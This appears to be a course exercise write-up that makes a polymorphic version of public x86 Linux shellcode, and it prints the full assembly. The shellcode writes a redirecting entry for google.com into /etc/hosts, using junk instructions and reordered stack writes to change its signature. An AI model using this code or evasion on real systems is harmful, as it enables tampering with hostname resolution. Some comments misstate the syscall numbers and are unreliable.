6_2 - ADDING ENTRIES TO "/ETC/HOSTS" FILE
- Same concepts studied at 6_1 apply in this case.
2 - MODIFYING A SHELLCODE
- The original program to be modified in this practice has the effect of adding a new entry in hosts file pointing 127.1.1.1 to google.com:
http://shell-storm.org/shellcode/files/shellcode-893.php
- Let's see 3 possible modifications:
a) Based in the fact that any number AND-ed by itself is the same number, the junk instruction "and edx,edx" is introduced, which effect on the functionality of the program is null:
https://en.wikipedia.org/wiki/Truth_table#Logical_conjunction_.28AND.29
b) Instead of pushing "/etc///hosts" characters directly onto the stack, they are moved in chunks of 4 to the stack:
mov dword [esp-4],0x7374736f ; instead of pushing
mov dword [esp-8],0x682f2f2f ; /etc///hosts
mov dword [esp-12],0x6374652f ; is moved into esp
sub esp,0xc
c) Finally, instead of using the stack to load identifiers of syscalls, "mov" instruction is used. This method is used for write(20), close(6) and exit(1):
;push 20
;pop edx
mov dl,0x14 ; identifier (20) for write syscall is moved to dl
int 0x80
;push 0x6
;pop eax
mov al,0x6 ; identifier (6) for close syscall is moved to al
int 0x80
;push 0x1
;pop eax
mov al,0x1
int 0x80 ; identifier (1) for exit syscall is moved to al
- The resulting assembly program of applying these modifications is A6_2.nasm:
global _start
section .text
_start:
and edx,edx ; junk instruction with no effect
xor ecx, ecx
mul ecx
mov al, 0x5
push ecx
;push 0x7374736f ;/etc///hosts
;push 0x682f2f2f
;push 0x6374652f
mov dword [esp-4],0x7374736f ; instead of pushing
mov dword [esp-8],0x682f2f2f ; /etc///hosts
mov dword [esp-12],0x6374652f ; is moved into esp
sub esp,0xc
mov ebx, esp
mov cx, 0x401
int 0x80
xchg eax, ebx
push 0x4
pop eax
jmp short _load_data
_write:
pop ecx
;push 20
;pop edx
mov dl,0x14 ; identifier (20) for write syscall is moved to dl
int 0x80
;push 0x6
;pop eax
mov al,0x6 ; identifier (6) for close syscall is moved to al
int 0x80
;push 0x1
;pop eax
mov al,0x1
int 0x80 ; identifier (1) for exit syscall is moved to al
_load_data:
call _write
google db "127.1.1.1 google.com"
3 - TESTING POLYMORPHISM
- Assembling and linking A6_2.nasm:
- Extracting the shellcode:
- Applying to ShellcodeTest.c program:
- Compiling ShellcodeTest.c:
- Executing ShellcodeTest.c:
- The result is the same as the original program, a new entry is created into "/etc/hosts" file, pointing 127.1.1.1 to google.com:
- While the original shellcode had 77 Bytes, the new one has got 88 Bytes. It means an increment of 14%.
